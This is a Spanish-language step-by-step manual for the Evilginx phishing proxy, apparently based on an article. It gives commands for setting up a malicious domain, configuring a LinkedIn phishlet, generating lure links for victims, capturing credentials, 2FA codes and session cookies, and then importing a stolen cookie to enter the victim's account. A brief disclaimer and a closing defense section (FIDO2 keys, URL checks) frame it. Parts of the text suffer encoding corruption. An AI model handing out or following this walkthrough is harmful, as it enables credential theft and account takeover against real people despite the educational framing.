📖 Manual de Uso de Evilginx (Entorno Controlado)
Nota de Advertencia Legal y Ética: Este manual es exclusivamente con fines educativos y para su uso en entornos de prueba de penetración con autorización explÃcita por escrito de los propietarios de los sistemas. El uso de estas técnicas contra sitios web sin permiso es ilegal en la mayorÃa de las jurisdicciones .
Paso 1: Requisitos Previos
Servidor: Un VPS (Servidor Privado Virtual) con Linux (Ubuntu/Debian).
Dominio: Un dominio controlado por ti (para el ataque simulado). En el texto, el autor usa
incibenomedenuncies.comcomo dominio malicioso.Certificado SSL/TLS: Necesitas un certificado para tu dominio malicioso para que la conexión HTTPS parezca legÃtima. Puedes obtener uno gratis con Let's Encrypt .
Paso 2: Instalación
La forma más rápida es descargar el binario precompilado desde el repositorio oficial de Evilginx o clonarlo y compilarlo.
# Clonar el repositorio (ejemplo conceptual)
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
# Compilar o ejecutar el binario según las instrucciones del repositorioPaso 3: Configuración del "Phishlet"
Evilginx funciona con "phishlets", que son perfiles de configuración para sitios especÃficos (ej. Office 365, Facebook, Instagram). El texto menciona que la herramienta necesita "pequeños archivos de configuración".
Inicia Evilginx:
./evilginx -p(modo phishlet).Configura el dominio y IP de tu servidor (Ejemplo conceptual basado en el texto):
config domain your-malicious-domain.com config ip X.X.X.X (IP de tu servidor)Configura el phishlet para el objetivo (ej.
linkedin):phishlets host linkedin your-malicious-domain.com
Paso 4: Creación del "Lure" (Señuelo)
Este paso corresponde a cuando el autor dice: "con un link personalizado que activa el demonio".
Crea un señuelo para el phishlet configurado:
lures create linkedinObtén la URL del señuelo (el enlace que recibirá la vÃctima):
lures get-url [ID_DEL_SEÑUELO]Esto generará un enlace como
https://your-malicious-domain.com/some-random-path. Este enlace es el que se envÃa a la vÃctima.
Paso 5: Ejecución del Ataque (Simulado)
Activa el phishlet para empezar a interceptar:
phishlets enable linkedinA partir de este momento, cualquier visita al enlace generado será interceptada.
Flujo de la VÃctima (como se describe en el texto):
Al hacer clic, ve el sitio legÃtimo (ej. la pantalla de login de LinkedIn), pero su tráfico pasa por tu servidor.
Introduce usuario, contraseña y código 2FA.
Evilginx captura las credenciales y, lo más importante, la cookie de sesión que el sitio legÃtimo envÃa después de verificar el 2FA.
Paso 6: Captura de Sesión (El "Cookie Hijack")
Este es el punto crÃtico del texto: "Cualquiera que se haga con estas cookies de sesión puede suplantarte sin tener que loguearse".
En la consola de Evilginx, verás las credenciales y las sesiones capturadas:
sessionsPara suplantar a la vÃctima (como hace el autor al final del texto), necesitas importar esa cookie en tu navegador.
Utiliza un editor de cookies (como "Cookie-Editor" extensión de Chrome).
Copia el contenido de la cookie de sesión capturada por Evilginx.
Pégala en tu navegador mientras estás en el dominio legÃtimo (ej.
linkedin.com).Resultado: Recargarás la página y entrarás directamente a la cuenta de la vÃctima sin necesidad de contraseña ni 2FA, como se demuestra en el video del texto.
🛡️ Conclusión y Defensa
El texto y el manual demuestran que el factor humano sigue siendo el eslabón más débil. No importa cuán robusto sea un sistema de 2FA si el atacante roba la "sesión" después de que tú la abriste.
Las defensas clave según el texto y la investigación son:
Inspeccionar la URL y el Certificado: El autor sugiere verificar siempre el dominio y que el certificado SSL corresponda exactamente al sitio que visitas (aunque advierte que esto también puede ser suplantado en ciertas condiciones).
Usar 2FA resistente al phishing (FIDO2/WebAuthn): Llaves fÃsicas (como YubiKey) o passkeys. A diferencia del SMS o apps TOTP (como Google Authenticator), estas tecnologÃas vinculan la autenticación al origen del dominio, haciendo que este tipo de proxy sea inútil .
Desconfiar de los enlaces: Nunca introduzcas credenciales en enlaces recibidos por correo o mensajes inesperados. Accede manualmente escribiendo la URL en el navegador.
Nota final: Tal como advierte el autor del texto, esta técnica es poderosa y real. Su conocimiento es esencial para que los defensores puedan entender la magnitud de la amenaza y aplicar las defensas adecuadas.